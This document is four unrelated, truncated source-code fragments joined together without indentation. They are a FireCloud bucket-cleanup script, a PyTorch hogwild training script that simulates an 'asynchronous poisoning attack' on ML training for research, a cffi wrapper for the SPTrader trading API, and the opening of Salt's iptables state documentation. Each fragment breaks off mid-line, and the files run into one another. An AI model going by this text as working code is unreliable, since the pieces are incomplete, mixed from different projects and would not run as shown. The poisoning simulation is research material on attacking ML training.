user_submission_request = fapi.list_submissions(args.project, args.workspace)
# Check if API call was successful, in the case of failure, the function will return an error
fapi._check_response_code(user_submission_request, 200)
# Sort user submission ids for future bucket file verification
submission_ids = set(item['submissionId'] for item in user_submission_request.json())
# Check to see if bucket file path contain the user's submission id
# to ensure deletion of files in the submission directories only.
# Splits the bucket file: "gs://bucket_Id/submission_id/file_path", by the '/' symbol
# and stores values in a 5 length array: ['gs:', '' , 'bucket_Id', submission_id, file_path]
# to extract the submission id from the 4th element (index 3) of the array
bucket_files = set(bucket_file for bucket_file in bucket_file_sizes if bucket_file.split('/', 4)[3] in submission_ids)
except subprocess.CalledProcessError as e:
eprint("Error retrieving files from bucket:" +
"\n\t{}\n\t{}".format(str(e), e.output))
return 1
if args.verbose:
num = len(bucket_files)
if args.verbose:
print("Found {} files in bucket {}".format(num, bucket))
# Now build a set of files that are referenced in the bucket
# 1. Get a list of the entity types in the workspace
r = fapi.list_entity_types(args.project, args.workspace)
fapi._check_response_code(r, 200)
entity_types = r.json().keys()
# 2. For each entity type, request all the entities
for etype in entity_types:
if args.verbose:
print("Getting annotations for " + etype + " entities...")
# use the paginated version of the query
entities = _entity_paginator(args.project, args.workspace, etype,
page_size=1000, filter_terms=None,
sort_direction="asc")
for entity in entities:
update_referenced_files(referenced_files,
entity['attributes'].values(),
bucket_prefix)
if args.verbose:
num = len(referenced_files)
print("Found {} referenced files in workspace {}".format(num, workspace_name))
# Set difference shows files in bucket that aren't referenced
unreferenced_files = bucket_files - referenced_files
# Filter out files like .logs and rc.txt
def can_delete(f):
'''Return true if this file should not be deleted in a mop.'''
filename = f.rsplit('/', 1)[-1]
# Don't delete logs
if filename.endswith('.log'):
return False
# Don't delete return codes from jobs
if filename.endswith('-rc.txt'):
return False
if filename == "rc":
return False
# Don't delete tool's exec.sh or script
if filename in ('exec.sh', 'script'):
return False
# keep stdout, stderr, and output
if filename in ('stderr', 'stdout', 'output'):
return False
# Only delete specified unreferenced files
if args.include:
for glob in args.include:
if fnmatchcase(filename, glob):
return True
return False
# Don't delete specified unreferenced files
if | |
#!/home/josers2/anaconda3/bin/python
"""A hogwild style ASGD implementation of RESNET
Based on: https://github.com/pytorch/examples/tree/master/mnist_hogwild
Network and Performance modifications are:
- Use Cifar10 and {Resnet,Lenet}
- Use a step learning rate
- Use the main thread for evaluations, instead of the worker threads
(instead of waiting on a join call, it periodically checks thread status)
Usability modifications are:
- Generate CSV logs of output, rather than dumping to STDOUT
- Use python logger instead of dumping to STDOUT
Asynchronous Poisoning Attack modifications are:
- Have worker threads communicate when they find a biased , and
increase the time between when they find the batch and when they do work
with the batch. This simplifies the granularity needed by the OS to halt
them. The bias is calculated by the threads instead of over a side channel.
- Have the main thread communicate when training is ending, so the OS can
release the halted attack threads
All communication with the OS is done through files (see apa.sh)
Authors: <NAME>, <EMAIL>
<NAME>, <EMAIL>
"""
# pylint: disable=C0103,R0903
from __future__ import print_function
import logging
import argparse
import time
import os
import sys
from shutil import rmtree, copy
import tarfile
import errno
import csv
from tqdm import tqdm
import torch # pylint: disable=F0401
import torch.multiprocessing as mp # pylint: disable=F0401
from torchvision import datasets
from models.models.resnet import ResNet18
from train import train, test
# Training settings
parser = argparse.ArgumentParser(description='APA Demonstration')
parser.add_argument('runname', help='name for output files')
# TODO fix default paths
parser.add_argument('--tmp-dir', type=str, default='/tmp',
help="Directory to run out of. Prevents files from being"
"left all over the place, or in case you don't want to run"
"out of NFS")
parser.add_argument('--final-dir', type=str,
default='outputs',
help='Directory to place final outputs in')
# options for simulated attacks
sub_parsers = parser.add_subparsers(dest='mode', help='Sub-Command help')
mlti_sim_prs = sub_parsers.add_parser('simulate-multi',
help='Simulate Stale params APA (No OS)')
mlti_sim_prs.add_argument('--step-size', default=10, type=int, metavar='S',
help='Number of threads at each multi attack stage')
mlti_sim_prs.add_argument('--num-stages', default=10, type=int, metavar='NS',
help='Number of multi attack stages')
lr_sim_prs = sub_parsers.add_parser('simulate',
help='Simulate Stale LR APA (No OS)')
lr_sim_prs.add_argument('--attack-batches', default=1, type=int,
metavar='AB',
help='Number of biased updates to apply')
sub_parsers.add_parser('baseline',
help='Enables CUDA training. '
'Useful for training checkpoints. Do not use for the '
'attack, as training must be CPU based and '
'multithreaded.')
# checkpoint options
ckpt_group = parser.add_argument_group('Checkpoint Options')
# TODO include epoch in checkpoint
ckpt_group.add_argument('--resume', default=-1, type=int, metavar='RE',
help='Use checkpoint, from epoch [RE]')
ckpt_group.add_argument('--attack-checkpoint-path', type=str, default='train',
metavar='CN', help='Checkpoint load/save name')
ckpt_group.add_argument('--baseline-checkpoint-path', type=str, default=None,
metavar='CLN', help="If specified, load from this "
"checkpoint, but don't save to it")
ckpt_group.add_argument('--prepend-logs', type=str, default=None,
metavar='PRE', help='Logs to prepend checkpoint with. '
'Useful for plotting simulations with the baseline')
# TODO implement soft-resume
# ckpt_group.add_argument('--soft-resume', action='store_true', help='Use '
# 'checkpoint iff available')
# training options
train_group = parser.add_argument_group('Training Options')
train_group.add_argument('--max-steps', default=1, type=int, metavar='MS',
help='Number of non-attack epochs to train for. '
'DOES NOT AFFECT SIMULATED ATTACK THREADS.')
train_group.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='Initial learning rate (default: 0.1)')
train_group.add_argument('--num-processes', type=int, default=1, metavar='N',
help='how many training processes to use '
'(default: 2)')
train_group.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
train_group.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
train_group.add_argument('--optimizer', type=str, default='sgd',
metavar='OPTIM', choices=['sgd', 'adam', 'rms'])
# attack options
atk_group = parser.add_argument_group('Attack Options; for OS managed and Sim')
atk_group.add_argument('--target', type=int, default=-1, metavar='T',
help='Target label for biased batch. -1 is target-any.')
atk_group.add_argument('--bias', type=float, default=0.2, metavar='B',
help='How biased a batch should be. To simulate an '
'indiscriminate attack, set this value to 0.10 (equal '
' distribution of all labels in each batch)')
def procs_alive(procs):
"""Returns true as long as any worker is alive
Used as a non-blocking join. """
for cp in procs:
if cp.is_alive():
return True
logging.debug('No Process alive')
return False
def setup_outfiles(dirname, final_dir, prepend=None):
"""Call this function with the output directory for logs
If the output directory does not exist, it is created.
If the output directory exists, but has old logs, they are removed.
If using a checkpoint, allows for prepending the old logs to the new ones,
for convenience when graphing."""
if prepend is not None:
assert(prepend != dirname), 'Prepend and output cannot be the same!'
# Create directory and clear files if they exist
if os.path.exists(dirname):
try:
rmtree(dirname)
logging.warning('Removed old output directory (%s)', dirname)
except OSError:
logging.error(sys.exc_info()[0])
sys.exit(1)
os.mkdir(dirname)
if not os.path.exists(final_dir):
os.mkdir(final_dir)
if prepend is not None: # prepending from checkpoint
assert(os.path.exists(prepend)), 'Prepend directory not found'
logging.info('Prepending logs from %s', prepend)
# Make sure prepend path exists, then copy the logs over
log_files = ['eval', 'conf.0', 'conf.1', 'conf.2', 'conf.3', 'conf.4',
'conf.5', 'conf.6', 'conf.7', 'conf.8', 'conf.9']
for cf in log_files:
logging.debug('Current file is %s', cf)
pre_fpath = f'{prepend}/{cf}'
assert(os.path.isfile(pre_fpath)), f"Missing {pre_fpath}"
copy(pre_fpath, f"{dirname}/{cf}")
def setup_and_load():
'''Setup checkpoints directories, and load if necessary'''
mdl = ResNet18().to(device)
# gradients are allocated lazily, so they are not shared here
mdl.share_memory()
# Make sure the directory to save checkpoints already exists
ckpt_dir = f'{args.tmp_dir}'
try:
os.mkdir(ckpt_dir)
logging.info('Created checkpoint directory (%s)', ckpt_dir)
except OSError as e:
if e.errno == errno.EEXIST:
logging.warning('Checkpoint directory already exist (%s)',
ckpt_dir)
else:
raise
# set load checkpoint name - if lckpt is set, use that otherwise use
# the same as the save name
ckpt_fname = f"{ckpt_dir}/{args.attack_checkpoint_path}.ckpt"
bestAcc = None
# load checkpoint if resume epoch is specified
if args.mode == 'simulate' or args.mode == 'simulate-multi':
assert(args.resume != -1), 'Simulate should be used with a checkpoint'
ckpt_load_fname = ckpt_fname if args.baseline_checkpoint_path is None \
else args.baseline_checkpoint_path
assert(os.path.isfile(ckpt_load_fname)), f'{ckpt_load_fname} not found'
checkpoint = torch.load(ckpt_load_fname,
map_location=lambda storage, loc: storage)
mdl.load_state_dict(checkpoint['net'])
bestAcc = checkpoint['acc']
setup_outfiles(outdir, args.final_dir, prepend=args.prepend_logs)
logging.info('Resumed from %s at %.3f', ckpt_load_fname, bestAcc)
else:
# for a full run, nothing to prepend or resume
setup_outfiles(outdir, args.final_dir)
return mdl, bestAcc, ckpt_fname
def inf_iter(procs):
'''Generator for TQDM on list of processes'''
while True:
yield procs_alive(procs)
def launch_atk_proc():
'''When simulating, run the attack thread alone'''
rank = 0
# atk_p = mp.Process(target=train, args=(rank, args, model, device,
# dataloader_kwargs))
# atk_p.start()
log = []
# eval_counter = 0
train(rank, args, model, device, dataloader_kwargs)
# while procs_alive([atk_p]):
# time.sleep(10)
# with tqdm(inf_iter([atk_p]), position=0, desc=f'{args.runname}',
# total=float("inf"), unit='Validation') as tbar:
# # while atk_p.is_alive(): # evaluate and log!
# for p_status in tbar:
# if p_status is False:
# break
#
# # evaluate without logging; logging is done by the worker
# _, val_acc = test(args, model, device, dataloader_kwargs,
# etime=None)
#
# log.append({'vacc': val_acc,
# 'time': eval_counter})
# logging.info('Attack Accuracy is %s', val_acc)
# tbar.set_postfix(acc=val_acc)
# eval_counter += 1
# # update checkpoint
# torch.save({'net': model.state_dict(), 'acc': val_acc},
# ckpt_output_fname)
# evaluate post attack
# If simulated, eval counter is the number of attack batches
# if multi sim, eval counter is the number of stages
if args.mode == 'simulate': # Variant 1 Simulation
post_attack_step = args.attack_batches
else: # Variant 2 Simulation
post_attack_step = args.num_stages
with open(f"{outdir}/eval", 'w') as eval_f:
writer = csv.DictWriter(eval_f, fieldnames=['time', 'vacc'])
for dat in log:
writer.writerow(dat)
return post_attack_step
def launch_procs(eval_counter=0, s_rank=0):
'''Launch normal workers.
If no workers would be spawned, just return. This will happen if
simulating with a single worker --- no recovery time is allowed. '''
if s_rank == args.num_processes:
_, val_acc = test(args, model, device, dataloader_kwargs,
etime=eval_counter)
return val_acc
# Spawn the worker processes. Each runs an independent call of the train
# function
processes = []
for rank in range(s_rank, args.num_processes):
p = mp.Process(target=train, args=(rank, args, model, device,
dataloader_kwargs))
p.start()
processes.append(p)
logging.info('Started %s', p.pid)
log = []
# While any process is alive, continuously evaluate accuracy - the master
# thread is the evaluation thread
with tqdm(inf_iter(processes), position=0, desc='Testing',
total=float("inf"), unit='Validation') as tbar:
for p_status in tbar:
if p_status is False:
break
# log in test
_, val_acc = test(args, model, device, dataloader_kwargs,
etime=eval_counter)
log.append({'vacc': val_acc,
'time': eval_counter})
# tqdm.write(f'Accuracy is {vacc}')
logging.info('Accuracy is %s', val_acc)
eval_counter += 1
tbar.set_postfix(acc=val_acc)
# update checkpoint
torch.save({'net': model.state_dict(), 'acc': val_acc},
ckpt_output_fname)
time.sleep(60)
# open eval log as append in case we're simulating and the attack thread
# added some data
with open(f"{outdir}/eval", 'a') as eval_f:
writer = csv.DictWriter(eval_f, fieldnames=['time', 'vacc'])
for dat in log:
writer.writerow(dat)
# There should be no processes left alive by this point, but do this anyway
# to make sure no orphaned processes are left behind
for proc in processes:
os.system("kill -9 {}".format(proc.pid))
return val_acc
if __name__ == '__main__':
args = parser.parse_args()
FORMAT = '%(message)s | |
<filename>sptrader/sptrader.py
###############################################################################
#
# Copyright (C) 2016 Bitquant Research Laboratories (Asia) Limited
#
# Licensed under the GPLv3+ License
#
###############################################################################
from cffi import FFI
import atexit
import os
import struct
import cffi_to_py
import sys
from enum import Enum
if 8 * struct.calcsize("P") != 64:
print("sptrader only supported for 64 bit")
print("sptrader_api string needs to be checked for 32-bit")
exit
location = os.path.dirname(os.path.realpath(__file__))
dll_location = os.path.join(location, "..", "dll")
ffi = FFI()
spapi_cdef = """
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef char tinyint;
typedef unsigned char u_tinyint;
typedef unsigned char u_char;
typedef unsigned short u_short;
typedef unsigned int u_int;
typedef unsigned long u_long;
typedef long long bigint;
typedef unsigned long long u_bigint;
typedef char STR4[4];
typedef char STR16[16];
typedef char STR40[40];
typedef struct
{
int32_t Qty;
int32_t DepQty;
int32_t LongQty;
int32_t ShortQty;
double TotalAmt;
double DepTotalAmt;
double LongTotalAmt;
double ShortTotalAmt;
double PLBaseCcy;
double PL;
double ExchangeRate;
STR16 AccNo;
STR16 ProdCode;
char LongShort;
tinyint DecInPrice;
} SPApiPos;
typedef struct
{
double Price;
double StopLevel;
double UpLevel;
double UpPrice;
double DownLevel;
double DownPrice;
bigint ExtOrderNo;
int32_t IntOrderNo;
int32_t Qty;
int32_t TradedQty;
int32_t TotalQty;
int32_t ValidTime;
int32_t SchedTime;
int32_t TimeStamp;
uint32_t OrderOptions;
STR16 AccNo;
STR16 ProdCode;
STR16 Initiator;
STR16 Ref;
STR16 Ref2;
STR16 GatewayCode;
STR40 ClOrderId;
char BuySell;
char StopType;
char OpenClose;
tinyint CondType;
tinyint OrderType;
tinyint ValidType;
tinyint Status;
tinyint DecInPrice;
tinyint OrderAction;
int32_t UpdateTime;
int32_t UpdateSeqNo;
} SPApiOrder;
typedef struct
{
bigint BidExtOrderNo;
bigint AskExtOrderNo;
long BidAccOrderNo;
long AskAccOrderNo;
double BidPrice;
double AskPrice;
long BidQty;
long AskQty;
long SpecTime;
u_long OrderOptions;
STR16 ProdCode;
STR16 AccNo;
STR40 ClOrderId;
STR40 OrigClOrdId;
tinyint OrderType;
tinyint ValidType;
tinyint DecInPrice;
} SPApiMMOrder;
typedef struct
{
int32_t RecNo;
double Price;
bigint TradeNo;
bigint ExtOrderNo;
int32_t IntOrderNo;
int32_t Qty;
int32_t TradeDate;
int32_t TradeTime;
STR16 AccNo;
STR16 ProdCode;
STR16 Initiator;
STR16 Ref;
STR16 Ref2;
STR16 GatewayCode;
STR40 ClOrderId;
char BuySell;
char OpenClose;
tinyint Status;
tinyint DecInPrice;
double OrderPrice;
STR40 TradeRef;
int32_t TotalQty;
int32_t RemainingQty;
int32_t TradedQty;
double AvgTradedPrice;
} SPApiTrade;
typedef struct
{
double Margin;
double ContractSize;
STR16 MarketCode;
STR16 InstCode;
STR40 InstName;
STR40 InstName1;
STR40 InstName2;
STR4 Ccy;
char DecInPrice;
char InstType;
} SPApiInstrument;
typedef struct
{
STR16 ProdCode;
char ProdType;
STR40 ProdName;
STR16 Underlying;
STR16 InstCode;
int32_t ExpiryDate;
char CallPut;
int32_t Strike;
int32_t LotSize;
STR40 ProdName1;
STR40 ProdName2;
char OptStyle;
int32_t TickSize;
}SPApiProduct;
typedef struct
{
double Bid[20];
int32_t BidQty[20];
int32_t BidTicket[20];
double Ask[20];
int32_t AskQty[20];
int32_t AskTicket[20];
double Last[20];
int32_t LastQty[20];
int32_t LastTime[20];
double Equil;
double Open;
double High;
double Low;
double Close;
int32_t CloseDate;
double TurnoverVol;
double TurnoverAmt;
int32_t OpenInt;
STR16 ProdCode;
STR40 ProdName;
char DecInPrice;
int32_t ExStateNo;
int32_t TradeStateNo;
bool Suspend;
int32_t ExpiryYMD;
int32_t ContractYMD;
int32_t Timestamp;
} SPApiPrice;
typedef struct
{
double Price;
int32_t Qty;
int32_t TickerTime;
int32_t DealSrc;
STR16 ProdCode;
char DecInPrice;
} SPApiTicker;
typedef struct
{
double NAV;
double BuyingPower;
double CashBal;
double MarginCall;
double CommodityPL;
double LockupAmt;
double CreditLimit;
double MaxMargin;
double MaxLoanLimit;
double TradingLimit;
double RawMargin;
double IMargin;
double MMargin;
double TodayTrans;
double LoanLimit;
double TotalFee;
double LoanToMR;
double LoanToMV;
STR16 AccName;
STR4 BaseCcy;
STR16 MarginClass;
STR16 TradeClass;
STR16 ClientId;
STR16 AEId;
char AccType;
char CtrlLevel;
char Active;
char MarginPeriod;
} SPApiAccInfo;
typedef struct
{
double CashBf;
double TodayCash;
double NotYetValue;
double Unpresented;
double TodayOut;
STR4 Ccy;
} SPApiAccBal;
typedef struct
{
STR4 Ccy;
double Rate;
} SPApiCcyRate;
typedef void (SPDLLCALL *LoginReplyAddr)(long ret_code, char *ret_msg);
typedef void (SPDLLCALL *ConnectedReplyAddr)(long host_type, long con_status);
typedef void (SPDLLCALL *ApiOrderRequestFailedAddr)(tinyint action,
SPApiOrder *order, long err_code, char *err_msg);
typedef void (SPDLLCALL *ApiOrderReportAddr)(long rec_no, SPApiOrder *order);
typedef void (SPDLLCALL *ApiOrderBeforeSendReportAddr)(SPApiOrder *order);
typedef void (SPDLLCALL *AccountLoginReplyAddr)(char *accNo,
long ret_code, char* ret_msg);
typedef void (SPDLLCALL *AccountLogoutReplyAddr)(long ret_code, char* ret_msg);
typedef void (SPDLLCALL *AccountInfoPushAddr)(SPApiAccInfo *acc_info);
typedef void (SPDLLCALL *AccountPositionPushAddr)(SPApiPos *pos);
typedef void (SPDLLCALL *UpdatedAccountPositionPushAddr)(SPApiPos *pos);
typedef void (SPDLLCALL *UpdatedAccountBalancePushAddr)(SPApiAccBal *acc_bal);
typedef void (SPDLLCALL *ApiTradeReportAddr)(long rec_no, SPApiTrade *trade);
typedef void (SPDLLCALL *ApiPriceUpdateAddr)(SPApiPrice *price);
typedef void (SPDLLCALL *ApiTickerUpdateAddr)(SPApiTicker *ticker);
typedef void (SPDLLCALL *PswChangeReplyAddr)(long ret_code, char *ret_msg);
typedef void (SPDLLCALL *ProductListByCodeReplyAddr)(char *inst_code,
bool is_ready, char *ret_msg);
typedef void (SPDLLCALL *InstrumentListReplyAddr)(bool is_ready,
char *ret_msg);
typedef void (SPDLLCALL *BusinessDateReplyAddr)(long business_date);
typedef void (SPDLLCALL *ApiMMOrderBeforeSendReportAddr)
(SPApiMMOrder *mm_order);
typedef void (SPDLLCALL *ApiMMOrderRequestFailedAddr)(SPApiMMOrder *mm_order,
long err_code, char *err_msg);
typedef void (SPDLLCALL *ApiQuoteRequestReceivedAddr)(char *product_code,
char buy_sell, long qty);
void SPAPI_RegisterLoginReply(LoginReplyAddr addr);
void SPAPI_RegisterConnectingReply(ConnectedReplyAddr addr);
void SPAPI_RegisterOrderReport(ApiOrderReportAddr addr);
void SPAPI_RegisterOrderRequestFailed(ApiOrderRequestFailedAddr addr);
void SPAPI_RegisterOrderBeforeSendReport(ApiOrderBeforeSendReportAddr addr);
void SPAPI_RegisterAccountLoginReply(AccountLoginReplyAddr addr);
void SPAPI_RegisterAccountLogoutReply(AccountLogoutReplyAddr addr);
void SPAPI_RegisterAccountInfoPush(AccountInfoPushAddr addr);
void SPAPI_RegisterAccountPositionPush(AccountPositionPushAddr addr);
void
SPAPI_RegisterUpdatedAccountPositionPush(UpdatedAccountPositionPushAddr addr);
void
SPAPI_RegisterUpdatedAccountBalancePush(UpdatedAccountBalancePushAddr addr);
void SPAPI_RegisterTradeReport(ApiTradeReportAddr addr);
void SPAPI_RegisterApiPriceUpdate(ApiPriceUpdateAddr addr);
void SPAPI_RegisterTickerUpdate(ApiTickerUpdateAddr addr);
void SPAPI_RegisterPswChangeReply(PswChangeReplyAddr addr);
void SPAPI_RegisterProductListByCodeReply(ProductListByCodeReplyAddr addr);
void SPAPI_RegisterInstrumentListReply(InstrumentListReplyAddr addr);
void SPAPI_RegisterBusinessDateReply(BusinessDateReplyAddr addr);
void SPAPI_RegisterMMOrderRequestFailed(ApiMMOrderRequestFailedAddr addr);
void SPAPI_RegisterMMOrderBeforeSendReport(
ApiMMOrderBeforeSendReportAddr addr);
void SPAPI_RegisterQuoteRequestReceivedReport(
ApiQuoteRequestReceivedAddr addr);
int SPAPI_Initialize();
void SPAPI_SetLoginInfo(char *host,
int port, char *license, char *app_id, char *user_id, char *password);
int SPAPI_Login();
int SPAPI_GetLoginStatus(char *user_id, short host_id);
int SPAPI_AddOrder(SPApiOrder *order);
int SPAPI_AddInactiveOrder(SPApiOrder* order);
int SPAPI_ChangeOrder(char *user_id,
SPApiOrder* order, double org_price, long org_qty);
int SPAPI_ChangeOrderBy(char *user_id,
char *acc_no, long accOrderNo, double org_price,
long org_qty, double newPrice, long newQty);
int SPAPI_DeleteOrderBy(char *user_id,
char *acc_no, long accOrderNo, char* productCode, char* clOrderId);
int SPAPI_DeleteAllOrders(char *user_id, char *acc_no);
int SPAPI_ActivateAllOrders(char *user_id, char *acc_no);
int SPAPI_InactivateAllOrders(char *user_id, char *acc_no);
int SPAPI_ActivateOrderBy(char *user_id, char *acc_no, long accOrderNo);
int SPAPI_InactivateOrderBy(char *user_id, char *acc_no, long accOrderNo);
int SPAPI_GetOrderCount(char *user_id, char* acc_no);
int SPAPI_GetOrderByOrderNo(char *user_id, char *acc_no,
long int_order_no, SPApiOrder *order);
int SPAPI_GetPosCount(char *user_id);
int SPAPI_GetPosByProduct(char *user_id, char *prod_code, SPApiPos *pos);
void SPAPI_Uninitialize();
int SPAPI_Logout(char *user_id);
int SPAPI_AccountLogin(char *user_id, char *acc_no);
int SPAPI_AccountLogout(char *user_id, char *acc_no);
int SPAPI_GetTradeCount(char *user_id, char *acc_no);
int SPAPI_SubscribePrice(char *user_id, char *prod_code, int mode);
int SPAPI_SubscribeTicker(char *user_id, char *prod_code, int mode);
int SPAPI_ChangePassword(char *user_id, char *old_password,
char *new_password);
int SPAPI_GetDllVersion(char *dll_ver_no, char *dll_rel_no, char *dll_suffix);
int SPAPI_GetAccBalCount(char* user_id);
int SPAPI_GetAccBalByCurrency(char *user_id, char *ccy, SPApiAccBal *acc_bal);
int SPAPI_GetCcyRateByCcy(char *user_id, char *ccy, double *rate);
int SPAPI_GetAccInfo(char *user_id, SPApiAccInfo *acc_info);
int SPAPI_GetPriceByCode(char *user_id, char *prod_code, SPApiPrice *price);
int SPAPI_SetApiLogPath(char *path);
int SPAPI_LoadProductInfoListByCode(char *inst_code);
int SPAPI_GetProductCount();
int SPAPI_GetProductByCode(char *prod_code, SPApiProduct *prod);
int SPAPI_LoadInstrumentList();
int SPAPI_GetInstrumentCount();
int SPAPI_GetInstrumentByCode(char *inst_code, SPApiInstrument *inst);
int SPAPI_SetLanguageId(int langid);
int SPAPI_SendMarketMakingOrder(char *user_id, SPApiMMOrder *mm_order);
int SPAPI_SubscribeQuoteRequest(char *user_id, char *prod_code, int mode);
int SPAPI_SubscribeAllQuoteRequest(char *user_id, int mode);
int SPAPI_GetAllTradesByArray(char *user_id, char *acc_no,
SPApiTrade* apiTradeList);
int SPAPI_GetOrdersByArray(char *user_id, char *acc_no,
SPApiOrder* apiOrderList);
int SPAPI_GetAllAccBalByArray(char *user_id, SPApiAccBal* apiAccBalList);
int SPAPI_GetInstrumentByArray(SPApiInstrument* apiInstList);
int SPAPI_GetProductByArray(SPApiProduct* apiProdList);
"""
spapi = None
if os.name == "nt":
ffi.cdef(spapi_cdef.replace("SPDLLCALL", "__stdcall"))
ffi.dlopen(os.path.join(dll_location, "libeay32.dll"))
ffi.dlopen(os.path.join(dll_location, "ssleay32.dll"))
spapi = ffi.dlopen(os.path.join(dll_location, "spapidllm64.dll"))
else:
ffi.cdef(spapi_cdef.replace("SPDLLCALL", ""))
ffi.dlopen(os.path.join(dll_location, "libapiwrapper.so"),
ffi.RTLD_GLOBAL | ffi.RTLD_NOW)
spapi = ffi.dlopen(os.path.join(dll_location, "linux-shim.so"))
# Remember to convert unicode strings to byte strings otherwise
# ctypes will assume that the characters are wchars and not
# ordinary characters
class SPTrader(object):
ffi = ffi
api = spapi
ffi_conv = cffi_to_py.FfiConverter(ffi)
def __init__(self):
self.api.SPAPI_SetLanguageId(0)
self.api.SPAPI_Initialize()
self.user = None
self.acc_no = None
def ready(self):
if self.user is None:
return -1
else:
return 0
def register_login_reply(self, login_reply_func):
self.api.SPAPI_RegisterLoginReply(login_reply_func)
def register_connecting_reply(self, connected_reply_func):
self.api.SPAPI_RegisterConnectingReply(connected_reply_func)
def register_order_report(self, func):
self.api.SPAPI_RegisterOrderReport(func)
def register_order_request_failed(self, func):
self.api.SPAPI_RegisterOrderRequestFailed(func)
def register_order_before_send_report(self, func):
self.api.SPAPI_RegisterOrderBeforeSendReport(func)
def register_account_login_reply(self, func):
self.api.SPAPI_RegisterAccountLoginReply(func)
def register_account_logout_reply(self, func):
self.api.SPAPI_RegisterAccountLogoutReply(func)
def register_account_info_push(self, account_info_func):
self.api.SPAPI_RegisterAccountInfoPush(account_info_func)
def register_account_position_push(self, func):
self.api.SPAPI_RegisterAccountPositionPush(func)
def register_updated_account_position_push(self, func):
self.api.SPAPI_RegisterUpdatedAccountPositionPush(func)
def register_updated_account_balance_push(self, func):
self.api.SPAPI_RegisterUpdatedAccountBalancePush(func)
def register_trade_report(self, func):
self.api.SPAPI_RegisterTradeReport(func)
def register_price_update(self, func):
self.api.SPAPI_RegisterApiPriceUpdate(func)
def register_ticker_update(self, func):
self.api.SPAPI_RegisterTickerUpdate(func)
def register_psw_change_reply(self, func):
self.api.SPAPI_RegisterPswChangeReply(func)
def register_product_list_by_code_reply(self, func):
self.api.SPAPI_RegisterProductListByCodeReply(func)
def register_instrument_list_reply(self, func):
self.api.SPAPI_RegisterInstrumentListReply(func)
def register_business_date_reply(self, func):
self.api.SPAPI_RegisterBusinessDateReply(func)
def register_mm_order_request_failed(self, func):
self.api.SPAPI_RegisterMMOrderRequestFailed(func)
def register_mm_order_before_send_report(self, func):
self.api.SPAPI_RegisterMMOrderBeforeSendReport(func)
def register_quote_request_received_report(self, func):
self.api.SPAPI_RegisterQuoteRequestReceivedReport(func)
def load_instrument_list(self):
return self.api.SPAPI_LoadInstrumentList()
def set_login_info(self,
host,
port,
license,
app_id,
user_id,
password):
self.user = user_id.encode("utf-8")
self.acc_no = self.user
self.api.SPAPI_SetLoginInfo(host.encode("utf-8"),
port,
license.encode("utf-8"),
app_id.encode("utf-8"),
self.user,
password.encode("utf-8"))
def login(self):
return self.api.SPAPI_Login()
def get_login_status(self, status_id):
if self.user is None:
return -1
return self.api.SPAPI_GetLoginStatus(self.user, status_id)
def get_instrument_count(self):
return self.api.SPAPI_GetInstrumentCount()
def get_instrument(self):
count = self.get_instrument_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiInstrument[%d]" % (count))
if self.api.SPAPI_GetInstrumentByArray(buffer) == 0:
return self.cdata_to_py(buffer)
else:
return []
def get_product_count(self):
return self.api.SPAPI_GetInstrumentCount()
def get_product(self):
count = self.get_product_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiProduct[%d]" % (count))
if self.api.SPAPI_GetProductByArray(buffer) == 0:
return []
return self.cdata_to_py(buffer)
def get_acc_info(self):
if self.user is None:
return None
buffer = self.ffi.new("SPApiAccInfo[1]")
self.api.SPAPI_GetAccInfo(self.user, buffer)
return self.cdata_to_py(buffer[0])
def get_acc_bal_count(self):
return self.api.SPAPI_GetAccBalCount(self.user)
def get_order_count(self):
return self.api.SPAPI_GetOrderCount(self.user, self.acc_no)
def get_all_orders(self):
if self.ready() != 0:
return []
count = self.get_order_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiOrder[%d]" % (count))
if self.api.SPAPI_GetOrdersByArray(self.user,
self.acc_no,
buffer) != 0:
return []
return self.cdata_to_py(buffer)
def get_trade_count(self):
return self.api.SPAPI_GetTradeCount(self.user, self.acc_no)
def get_all_trades(self):
if self.ready() != 0:
return []
count = self.get_trade_count()
if count <= 0:
return []
buffer = self.ffi.new("SPApiTrade[%d]" % (count))
if self.api.SPAPI_GetAllTradesByArray(self.user,
self.acc_no,
buffer) != 0:
return []
return self.cdata_to_py(buffer)
def get_position_count(self):
return SPAPI_GetPosCount(self.user)
def get_price_by_code(self, code):
price = self.ffi.new("SPApiPrice[1]")
self.api.SPAPI_GetPriceByCode(self.user, code.encode("utf-8"), price)
return self.cdata_to_py(price)
def subscribe_price(self, prod, value):
self.api.SPAPI_SubscribePrice(self.user,
prod.encode("utf-8"), value)
def subscribe_ticker(self, prod, value):
self.api.SPAPI_SubscribeTicker(self.user,
prod.encode("utf-8"), value)
def logout(self):
user = self.user
if user is not None:
self.user = None
self.acc_no = None
return self.api.SPAPI_Logout(user)
def cdata_to_py(self, s):
return self.ffi_conv.to_py(s)
def fields(self, s):
return self.ffi_conv.fields(s)
def order_add(self, data):
data['AccNo'] = self.acc_no
data['Initiator'] = self.user
buffer = self.ffi.new("SPApiOrder[1]")
self.ffi_conv.from_py(buffer, data)
if buffer is None:
| |
<reponame>elblivion/salt<filename>salt/states/iptables.py
# -*- coding: utf-8 -*-
'''
Management of iptables
======================
This is an iptables-specific module designed to manage Linux firewalls. It is
expected that this state module, and other system-specific firewall states, may
at some point be deprecated in favor of a more generic `firewall` state.
.. code-block:: yaml
httpd:
iptables.append:
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.append:
- table: filter
- chain: INPUT
- jump: ACCEPT
- match:
- state
- comment
- comment: "Allow HTTP"
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.append:
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.insert:
- position: 1
- table: filter
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.insert:
- position: 1
- table: filter
- family: ipv6
- chain: INPUT
- jump: ACCEPT
- match: state
- connstate: NEW
- dport: 80
- proto: tcp
- sport: 1025:65535
- save: True
httpd:
iptables.delete:
- table: filter
